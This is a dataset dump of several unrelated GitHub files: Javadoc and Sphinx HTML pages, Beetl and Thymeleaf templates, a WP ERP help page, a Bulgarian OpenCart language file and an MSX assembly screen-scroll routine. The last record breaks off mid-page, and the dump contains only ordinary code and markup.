text
stringlengths
2
99.7k
meta
dict
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="de"> <head> <!-- Generated by javadoc (1.8.0_231) on Sun Nov 17 02:10:20 CET 2019 --> <title>org.deidentifier.arx.framework.lattice Class Hierarchy</title> <meta name="date" content="2019-11-17"> <link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="org.deidentifier.arx.framework.lattice Class Hierarchy"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/deidentifier/arx/framework/data/package-tree.html">Prev</a></li> <li><a href="../../../../../org/deidentifier/arx/gui/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/deidentifier/arx/framework/lattice/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a 
href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 class="title">Hierarchy For Package org.deidentifier.arx.framework.lattice</h1> <span class="packageHierarchyLabel">Package Hierarchies:</span> <ul class="horizontal"> <li><a href="../../../../../overview-tree.html">All Packages</a></li> </ul> </div> <div class="contentContainer"> <h2 title="Class Hierarchy">Class Hierarchy</h2> <ul> <li type="circle">java.lang.Object <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction</span></a> <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.NodeActionConstant.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction.NodeActionConstant</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/DependentAction.NodeActionInverse.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">DependentAction.NodeActionInverse</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a 
href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.ObjectIteratorIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator.ObjectIteratorIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/ObjectIterator.ObjectIteratorLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">ObjectIterator.ObjectIteratorLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpace.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpace</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpaceIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpaceIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/SolutionSpaceLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">SolutionSpaceLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/Transformation.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">Transformation</span></a>&lt;T&gt; <ul> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/TransformationIntArray.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationIntArray</span></a></li> <li type="circle">org.deidentifier.arx.framework.lattice.<a 
href="../../../../../org/deidentifier/arx/framework/lattice/TransformationLong.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationLong</span></a></li> </ul> </li> <li type="circle">org.deidentifier.arx.framework.lattice.<a href="../../../../../org/deidentifier/arx/framework/lattice/TransformationList.html" title="class in org.deidentifier.arx.framework.lattice"><span class="typeNameLink">TransformationList</span></a>&lt;T&gt;</li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li>Use</li> <li class="navBarCell1Rev">Tree</li> <li><a href="../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../../org/deidentifier/arx/framework/data/package-tree.html">Prev</a></li> <li><a href="../../../../../org/deidentifier/arx/gui/package-tree.html">Next</a></li> </ul> <ul class="navList"> <li><a href="../../../../../index.html?org/deidentifier/arx/framework/lattice/package-tree.html" target="_top">Frames</a></li> <li><a href="package-tree.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { 
allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
{ "pile_set_name": "Github" }
<% layout("/layouts/platform.html"){ %> <header class="header navbar bg-white shadow"> <div class="btn-group tool-button"> <a class="btn btn-primary navbar-btn" href="${base}/platform/sys/user" data-pjax id="goback"><i class="ti-angle-left"></i> 返回</a> </div> </header> <div class="content-wrap"> <div class="wrapper" style="min-height:500px;"> <section class="panel panel-form"> <form id="unitAddForm" role="form" class="form-horizontal parsley-form" data-parsley-validate action="${base}/platform/sys/user/editDo" method="post"> <div class="row mb10"> <div class="col-lg-12"> <div class="form-group has-feedback"> <label for="parentId" class="col-sm-2 control-label">所属单位</label> <div class="col-sm-8"> <div class="input-group"> <input id="parentId" type="text" class="form-control" placeholder="选择单位" disabled value="${obj.unit.name}" data-parsley-required="true"/> <span class="input-group-btn"> <button type="button" class="btn btn-primary <%if(!@shiro.hasRole('sysadmin')){%>disabled<%}%>" data-toggle="modal" data-target="#dialogSelectParentUnit"><i class="ti-plus"></i>选择 </button> </span> </div> <input type="hidden" name="id" value="${obj.id!}"> <input type="hidden" name="unitid" value="${obj.unitid!}"> <input type="hidden" name="oldLoginname" value="${obj.loginname!}"> </div> </div> <div class="form-group"> <label for="loginname" class="col-sm-2 control-label">用户名</label> <div class="col-sm-8"> <input type="text" id="loginname" value="${obj.loginname!}" class="form-control" name="loginname" data-parsley-required="true" placeholder="用户名"> </div> </div> <div class="form-group"> <label for="username" class="col-sm-2 control-label">姓名/昵称</label> <div class="col-sm-8"> <input type="text" id="username" class="form-control" name="username" data-parsley-required="true" placeholder="名称/昵称" value="${obj.username!}"> </div> </div> <div class="form-group"> <label for="email" class="col-sm-2 control-label">电子邮箱</label> <div class="col-sm-8"> <input type="text" id="email" name="email" 
value="${obj.email!}" data-parsley-type="email" class="form-control" placeholder="Email"> </div> </div> </div> </div> <div class="col-lg-3"></div> <div class="col-lg-6"> <div class="form-group text-center"> <label></label> <div> <button class="btn btn-primary btn-block btn-lg btn-parsley" data-loading-text="正在提交...">提 交</button> </div> </div> </div> </form> </section> </div> </div> <a class="exit-offscreen"></a> <!-- 选择上级单位 --> <div id="dialogSelectParentUnit" class="modal fade bs-modal-sm" tabindex="-1" role="dialog" aria-hidden="true"> <div class="modal-dialog"> <div class="modal-content"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h4 class="modal-title">选择上级单位</h4> </div> <div class="modal-body"> <div class="row"> <div class="col-xs-12"> <div id="jsTreeParentUnit" class="demo"></div> </div> </div> </div> <div class="modal-footer"> <button type="button" class="btn btn-default" data-dismiss="modal">取 消</button> <button type="button" class="btn btn-primary" onclick="selectParentMenu()">确认选择</button> </div> </div> </div> </div> <script language="JavaScript"> function initTreeView() { $("#jsTreeParentUnit").jstree({ plugins: ["wholerow", "json_data"], core: { data: { dataType: "json", url: function (node) { return node.id === "#" ? 
"${base}/platform/sys/user/tree" : "${base}/platform/sys/user/tree?pid=" + node.id } }, multiple: false } }).on("dblclick.jstree", function (node) { selectParentMenu(); }); } //选择父菜单 function selectParentMenu() { var tree = $.jstree.reference("#jsTreeParentUnit"); var node = tree.get_selected(true); $("#unitAddForm #parentId").val(node[0].text); $("#unitAddForm input[name='unitid']").val(node[0].id); $("#dialogSelectParentUnit").modal("hide"); } $(document).ready(function () { initTreeView(); $('#unitAddForm').ajaxForm({ dataType: 'json', beforeSubmit: function (arr, form, options) { form.find("button:submit").button("loading"); }, success: function (data, statusText, xhr, form) { if (data.code == 0) { Toast.success(data.msg); setTimeout(function () { $("#goback").trigger("click"); }, 1000); } else { Toast.error(data.msg); } form.find("button:submit").button("reset"); } }); }); </script> <%}%>
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html xmlns:th="http://www.thymeleaf.org"> <head> <meta charset="UTF-8"> <title>Insert title here</title> </head> <body> <!-- See javadoc API for class org.thymeleaf.expression.Strings 字符串转换 ${#strings.toString(obj)} 检查字符串是否为空(或空)。在检查前执行trim()操作 也适用于数组、列表或集合 ${#strings.isEmpty(name)} ${#strings.arrayIsEmpty(nameArr)}//如果为null则返回null 如果里面数据为null则为false否则为true ${#strings.listIsEmpty(nameList)} ${#strings.setIsEmpty(nameSet)} 对字符串执行“isEmpty()”检查,如果为false,则返回该字符串,默认为 如果为真,则另一个指定的字符串。 也适用于数组、列表或集合 ${#strings.defaultString(text,default)} ${#strings.arrayDefaultString(textArr,default)} ${#strings.listDefaultString(textList,default)} ${#strings.setDefaultString(textSet,default)} 检查字符串中是否包含片段也适用于数组、列表或集合 ${#strings.contains(name,'ez')} // also array*, list* and set* ${#strings.containsIgnoreCase(name,'ez')} // also array*, list* and set* 检查字符串是以片段开头还是结尾也适用于数组、列表或集合 ${#strings.startsWith(name,'Don')} // also array*, list* and set* ${#strings.endsWith(name,endingFragment)} // also array*, list* and set* 子串相关操作也适用于数组、列表或集合 ${#strings.indexOf(name,frag)} // also array*, list* and set* ${#strings.substring(name,3,5)} // also array*, list* and set* ${#strings.substringAfter(name,prefix)} // also array*, list* and set* ${#strings.substringBefore(name,suffix)} // also array*, list* and set* ${#strings.replace(name,'las','ler')} // also array*, list* and set* 追加和预付也适用于数组、列表或集合 ${#strings.prepend(str,prefix)} // also array*, list* and set* ${#strings.append(str,suffix)} // also array*, list* and set* 变更大小写也适用于数组、列表或集合。 ${#strings.toUpperCase(name)} // also array*, list* and set* ${#strings.toLowerCase(name)} // also array*, list* and set* 拆分和连接 ${#strings.arrayJoin(namesArray,',')} ${#strings.listJoin(namesList,',')} ${#strings.setJoin(namesSet,',')} ${#strings.arraySplit(namesStr,',')} // returns String[] ${#strings.listSplit(namesStr,',')} // returns List<String> ${#strings.setSplit(namesStr,',')} // returns Set<String> Trim 还可用于数组、列表或集合 ${#strings.trim(str)} 
计算长度也适用于数组、列表或集合。 ${#strings.length(str)} // also array*, list* and set* 缩写文本,使其最大大小为n。如果文本较大,则 将被裁剪并用“…”完成。 也适用于数组、列表或集合 ${#strings.abbreviate(str,10)} 将第一个字符转换为大写(反之亦然) ${#strings.capitalize(str)} // also array*, list* and set* ${#strings.unCapitalize(str)} // also array*, list* and set* 将每个单词的第一个字符转换为大写 ${#strings.capitalizeWords(str)} // also array*, list* and set* ${#strings.capitalizeWords(str,delimiters)} // also array*, list* and set* 转义字符串 ${#strings.escapeXml(str)} // also array*, list* and set* ${#strings.escapeJava(str)} // also array*, list* and set* ${#strings.escapeJavaScript(str)} // also array*, list* and set* ${#strings.unescapeJava(str)} // also array*, list* and set* ${#strings.unescapeJavaScript(str)} // also array*, list* and set* 空安全比较和连接 ${#strings.equals(first, second)} ${#strings.equalsIgnoreCase(first, second)} ${#strings.concat(values...)} ${#strings.concatReplaceNulls(nullValue, values...)} Random ${#strings.randomAlphanumeric(count)} --> <p th:text="${object}"></p> <p th:text="${#strings.toString(object)}"></p> <p th:text="${#strings.toString(numList)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.isEmpty(name)}"></p> <p th:text="${#strings.arrayIsEmpty(nameArr)}"></p> <p th:text="${#strings.listIsEmpty(nameList)}"></p> <p th:text="${#strings.setIsEmpty(nameSet)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.defaultString(text,'该值为null')}"></p> <p th:text="${#strings.arrayDefaultString(textArray,'该值为null')}"></p> <p th:text="${#strings.listDefaultString(textList,'该值为null')}"></p> <p th:text="${#strings.setDefaultString(textSet,'该值为null')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.contains('abcez','ez')}"></p> <p th:text="${#strings.containsIgnoreCase('abcEZ','ez')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.startsWith('Donabcez','Don')}"></p> <p 
th:text="${#strings.endsWith('Donabcezn','n')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.indexOf('abcefg','e')}"></p> <p th:text="${#strings.substring('abcefg',3,5)}"></p> <p th:text="${#strings.substringAfter('baceafg','a')}"></p> <p th:text="${#strings.substringBefore('bcaeefag','a')}"></p> <p th:text="${#strings.replace('lasabce','las','ler')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.prepend('abc','012')}"></p> <p th:text="${#strings.append('abc','456')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.toUpperCase('abc')}"></p> <p th:text="${#strings.toLowerCase('ABC')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.arrayJoin(namesArray,',')}"></p> <p th:text="${#strings.listJoin(namesList,',')}"></p> <p th:text="${#strings.setJoin(namesSet,',')}"></p> <p th:text="${#strings.arraySplit('a,b,c',',')}"></p> <p th:text="${#strings.listSplit('a,b,c',',')}"></p> <p th:text="${#strings.setSplit('a,b,c',',')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.trim(' abc ')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.length('abc')}"></p> <br>---------------------------------------------<br> <!-- 缩写文本,使其最大大小为n。如果文本较大,则将被裁剪并用“…”完成。也适用于数组、列表或集合 --> <p th:text="${#strings.abbreviate('12345678910',10)}"></p> <br>---------------------------------------------<br> <!-- 将第一个字符转换为大写(反之亦然) --> <p th:text="${#strings.capitalize('aBC')}"></p> <p th:text="${#strings.unCapitalize('Abc')}"></p> <br>---------------------------------------------<br> <!-- 将每个单词的第一个字符转换为大写 --> <p th:text="${#strings.capitalizeWords('abc bcd')}"></p> <!-- 第二个字符表示一什么进行分隔表示第二个单词 --> <p th:text="${#strings.capitalizeWords('abc,bcd',',')}"></p> <br>---------------------------------------------<br> <!-- 转义字符串 --> <p th:text="${#strings.escapeXml('<book>正面管教</book>')}"></p> <p 
th:text="${#strings.escapeJava('int i = 0')}"></p> <p th:text="${#strings.unescapeJava('int a = 0')}"></p> <p th:text="${#strings.escapeJavaScript('var a= 0;')}"></p> <p th:text="${#strings.unescapeJavaScript('var a= 0;')}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.equals('a', 'b')}"></p> <p th:text="${#strings.equalsIgnoreCase('a', 'A')}"></p> <p th:text="${#strings.concat('a','b','c','d')}"></p> <p th:text="${#strings.concatReplaceNulls('#', 'a','b','c','d',null,null)}"></p> <br>---------------------------------------------<br> <p th:text="${#strings.randomAlphanumeric(4)}"></p> </body> </html>
{ "pile_set_name": "Github" }
<div class="wrap"> <h1> <?php esc_html_e( 'HRM Help', 'erp' ); ?> <a href="https://wperp.com/docs/hr/" target="_blank" class="page-title-action"> <?php esc_html_e( 'View all Documentations', 'erp' ); ?> </a> </h1> <?php $erp_doc_sections = [ __( 'General', 'erp' ) => [ __( 'How to setup my company details in WP ERP?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/company/', __( 'How to disable any module (like-HRM, CRM or Accounting)?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/modules-management/', __( 'How to setup basic erp settings?', 'erp' ) => 'https://wperp.com/docs/erp-core/settings/global-settings/', __( 'How to translate WP ERP?', 'erp' ) => 'https://wperp.com/docs/erp-core/how-to-translate-wp-erp-plugin/', __( 'How to install developed version of WP ERP (github)?', 'erp' ) => 'https://wperp.com/docs/erp-core/installation/', ], __( 'Employee Management', 'erp' ) => [ __( 'How to add an employee?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/adding-employees/', __( 'How to add and manage departments?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/create-manage-department-hrm/', __( 'How to add and manage designation?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/creating-designations/', __( 'How to assign Department & Designation to employees?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/add-department-designation-employee/', __( 'How to manage permissions for the employees?', 'erp' ) => 'https://wperp.com/docs/hr/managing-employee/permission-management/', ], __( 'Leave Management', 'erp' ) => [ __( 'How to create Leave Policy?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/create-leave-policy/', __( 'How to create Leave Entitlement?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/leave-entitlements/', __( 'How to create Leave Request?', 'erp' ) => 'https://wperp.com/docs/hr/leave-management/creating-leave-requests/', __( 'How to Manage (Accept / Reject) Leave Requests?', 
'erp' ) => 'https://wperp.com/docs/hr/leave-management/managing-requests/', ], __( 'Miscellaneous', 'erp' ) => [ __( 'How to create announcement?', 'erp' ) => 'https://wperp.com/docs/hr/announcement/', __( 'How to setup working days for the employees?', 'erp' ) => 'https://wperp.com/docs/hr/settings/work-days/', __( 'How to generate reports?', 'erp' ) => 'https://wperp.com/docs/hr/reporting/', __( 'Do you have any video tutorial on HRM?', 'erp' ) => 'https://wperp.com/tv/category/hr/', ], ]; $sections = apply_filters( 'erp_hr_help_docs', $erp_doc_sections ); if ( ! empty( $sections ) ) { ?> <div id="dashboard-widgets-wrap"> <div id="dashboard-widgets" class="metabox-holder"> <?php foreach ( $sections as $section_title => $docs ) { ?> <div class="erp-help-section postbox-container"> <div class="metabox-holder"> <div class="meta-box-sortables"> <div class="postbox"> <h2 class="hndle"><?php echo esc_html( $section_title ); ?></h2> <?php if ( !empty( $docs ) ) { ?> <div class="erp-help-questions"> <ul> <?php foreach ( $docs as $title => $link ) { ?> <?php $tracking_url = add_query_arg( [ 'utm_source' => 'doc', 'utm_medium' => 'erp', 'utm_campaign' => 'manik', 'utm_content' => 'aion', ], untrailingslashit( $link ) ); ?> <li><a href="<?php echo esc_url_raw( $tracking_url ); ?>" target="_blank"><?php echo esc_html( $title ); ?> <span class="dashicons dashicons-arrow-right-alt2"></span></a></li> <?php } ?> </ul> </div> <?php } ?> </div> </div> </div> </div> <?php } ?> </div> </div> <?php } else { ?> <?php } ?> </div> <style type="text/css" media="screen"> .erp-help-questions li { margin: 0; border-bottom: 1px solid #eee; } .erp-help-questions li a { padding: 10px 15px; display: block; } .erp-help-questions li a:hover { background-color: #F5F5F5; } .erp-help-questions li:last-child { border-bottom: none; } .erp-help-questions li .dashicons { float: right; color: #ccc; margin-top: -3px; } @media screen and (min-width: 960px) { .erp-help-section .postbox-container{ width: 
100% !important; } .erp-help-section:nth-child(odd){ clear:both !important; } } </style>
{ "pile_set_name": "Github" }
<?php
/**
 * Bulgarian language pack for the "Materialize Map" OpenCart admin module.
 *
 * OpenCart loads this file and exposes the $_ array entries to the module's
 * admin controller/templates. Only the VALUES are localised text; the KEYS
 * are the lookup identifiers and must not be renamed or translated.
 */

// Heading
$_['heading_title'] = '<font color="#263238"><b><i class="fa fa-map-marker"></i>&nbsp;&nbsp;&nbsp;Materialize "Карта"</b></font>';
$_['map_title'] = 'Materialize "Карта"';

// Text
$_['text_module'] = 'Модули';
$_['text_success'] = 'Настройките на модула са обновени!';
$_['text_edit'] = 'Редактиране на Materialize Карта';
$_['text_coordinates'] = 'Координати';
$_['text_google_map'] = 'Google Maps';
$_['text_yandex_map'] = 'Yandex.Maps';
$_['entry_map'] = 'Карти';
$_['entry_api'] = 'Google API Key';
$_['entry_lat'] = 'Latitude';
$_['entry_lng'] = 'Longitude';
$_['entry_description'] = 'Описание';
$_['entry_icon_pin'] = 'Икона Pin';
$_['entry_icon_size'] = 'Икона размери';
$_['entry_width'] = 'Икона дължина';
$_['entry_height'] = 'Икона височина';
$_['entry_color_btn'] = 'Преглед на картата';
$_['entry_status'] = 'Статус';

// Help
$_['help_google_map'] = 'За да използвате <b>Google Maps</b>, трябва да получите <b>Google API Key</b> от <a href="//goo.gl/nhMAUA" target="_blank" rel="noopener"><b>this link</b></a> и да го въведете ръчно в съответното поле.';
$_['help_coordinates'] = 'Посочете координатите за Latitude, и Longitude.';
$_['help_icon_size'] = 'Първо, укажете дължината, а след това и височината на иконата в пиксели.';

// Error
$_['error_permission'] = 'Нямате разрешение да управлявате този модул!';
$_['error_google_api'] = 'Въведете вашият <b>Google API Key!</b>';
$_['error_geo_lat'] = 'Въведете <b>latitude!</b>';
$_['error_geo_lng'] = 'Въведете <b>longitude!</b>';
{ "pile_set_name": "Github" }
;
;	ANSI Video handling for the MSX
;
;	Handles colors
;
;	Scrollup
;
;	Stefano Bodrato - Sept. 2017
;
;	$Id: f_ansi_scrollup_nobios.asm $
;

SECTION	code_clib

PUBLIC	ansi_SCROLLUP
PUBLIC	__tms9918_scroll_buffer

EXTERN	__tms9918_attribute
EXTERN	LDIRVM
EXTERN	LDIRMV
EXTERN	FILVRM

; Scroll the whole TMS9918 text screen up by one character row (256 VRAM bytes).
; For each of rows 1..23, both the pattern-table row (VRAM base 0x0000) and the
; matching row of the second table at +8192 (presumably the colour table in this
; screen mode - TODO confirm) are copied one row earlier, staged through the
; __tms9918_scroll_buffer in RAM because VRAM-to-VRAM copies are not available.
; The freed bottom pattern row is then blanked with zeroes.
; Clobbers AF, BC, DE, HL; preserves IX.
.ansi_SCROLLUP
	push	ix
	ld	b,23			; 23 rows to move (row N -> row N-1)
	ld	hl,256			; VRAM address of row 1 in the pattern table
.scloop
	push	bc
	push	hl
	; stage the current pattern-table row into RAM
	ld	de,__tms9918_scroll_buffer
	ld	bc,256
	call	LDIRMV			; VRAM(hl) -> RAM(de), bc bytes
	pop	hl
	push	hl
	; write it back one row (256 bytes) earlier
	ld	de,-256
	add	hl,de
	ld	de,__tms9918_scroll_buffer
	ld	bc,256
	ex	de,hl
	call	LDIRVM			; RAM(hl) -> VRAM(de), bc bytes
	pop	hl
	push	hl
	; repeat the copy for the second table at +8192
	ld	de,8192
	add	hl,de
	push	hl
	ld	de,__tms9918_scroll_buffer
	ld	bc,256
	call	LDIRMV
	pop	hl
	ld	de,-256
	add	hl,de
	ld	de,__tms9918_scroll_buffer
	ld	bc,256
	ex	de,hl
	call	LDIRVM
	pop	hl
	inc	h			; advance hl by 256 to the next source row
	pop	bc
	djnz	scloop
	; hl is now one row past the last source row; step back 256 bytes to
	; address the freed bottom row of the pattern table
	dec	h
	xor	a
	ld	bc,256
	call	FILVRM			; fill 256 bytes at VRAM(hl) with A=0
	; NOTE(review): the freed bottom row of the +8192 table is NOT cleared
	; here; presumably the attribute/colour value is refreshed elsewhere
	; (__tms9918_attribute is declared but unused in this routine) - confirm.
	pop	ix
	ret

SECTION	bss_clib
; 256-byte (one screen row) staging buffer for the VRAM->RAM->VRAM copies above.
.__tms9918_scroll_buffer	defs	256
{ "pile_set_name": "Github" }
<!DOCTYPE html> <!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]--> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>btgym.algorithms.nn.ae &mdash; BTGym 0.0.7 documentation</title> <link rel="stylesheet" href="../../../../_static/css/theme.css" type="text/css" /> <link rel="index" title="Index" href="../../../../genindex.html"/> <link rel="search" title="Search" href="../../../../search.html"/> <link rel="top" title="BTGym 0.0.7 documentation" href="../../../../index.html"/> <link rel="up" title="Module code" href="../../../index.html"/> <script src="../../../../_static/js/modernizr.min.js"></script> </head> <body class="wy-body-for-nav" role="document"> <div class="wy-grid-for-nav"> <nav data-toggle="wy-nav-shift" class="wy-nav-side"> <div class="wy-side-scroll"> <div class="wy-side-nav-search"> <a href="../../../../index.html" class="icon icon-home"> BTGym </a> <div class="version"> 0.0.7 </div> <div role="search"> <form id="rtd-search-form" class="wy-form" action="../../../../search.html" method="get"> <input type="text" name="q" placeholder="Search docs" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> </div> <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation"> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html">Package Description</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#installation">Installation</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#quickstart">Quickstart</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#problem-definition">Problem definition</a></li> <li class="toctree-l1"><a class="reference internal" 
href="../../../../intro.html#environment-engine-description">Environment engine description</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#data-flow-structure">Data flow structure</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../intro.html#a3c-framework-description">A3C framework description</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.envs.html">btgym.envs package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html">btgym.dataserver module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html#module-btgym.server">btgym.server module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.html#module-btgym.spaces">btgym.spaces module</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.strategy.html">btgym.strategy package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.monitor.html">btgym.monitor package</a></li> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.rendering.html">btgym.rendering package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.datafeed.html">btgym.datafeed package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.algorithms.html">btgym.algorithms package</a></li> </ul> <ul> <li class="toctree-l1"><a class="reference internal" href="../../../../btgym.research.html">btgym.research package</a></li> </ul> </div> </div> </nav> <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap"> <nav class="wy-nav-top" role="navigation" aria-label="top navigation"> <i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a href="../../../../index.html">BTGym</a> </nav> <div class="wy-nav-content"> <div class="rst-content"> <div 
role="navigation" aria-label="breadcrumbs navigation"> <ul class="wy-breadcrumbs"> <li><a href="../../../../index.html">Docs</a> &raquo;</li> <li><a href="../../../index.html">Module code</a> &raquo;</li> <li>btgym.algorithms.nn.ae</li> <li class="wy-breadcrumbs-aside"> </li> </ul> <hr/> </div> <div role="main" class="document" itemscope="itemscope" itemtype="http://schema.org/Article"> <div itemprop="articleBody"> <h1>Source code for btgym.algorithms.nn.ae</h1><div class="highlight"><pre> <span></span><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="nn">np</span> <span class="kn">import</span> <span class="nn">tensorflow</span> <span class="k">as</span> <span class="nn">tf</span> <span class="kn">from</span> <span class="nn">tensorflow.contrib.layers</span> <span class="k">import</span> <span class="n">flatten</span> <span class="k">as</span> <span class="n">batch_flatten</span> <span class="kn">from</span> <span class="nn">tensorflow.contrib.layers</span> <span class="k">import</span> <span class="n">layer_norm</span> <span class="k">as</span> <span class="n">norm_layer</span> <span class="kn">from</span> <span class="nn">btgym.algorithms.nn.layers</span> <span class="k">import</span> <span class="n">normalized_columns_initializer</span><span class="p">,</span> <span class="n">linear</span><span class="p">,</span> <span class="n">conv2d</span> <div class="viewcode-block" 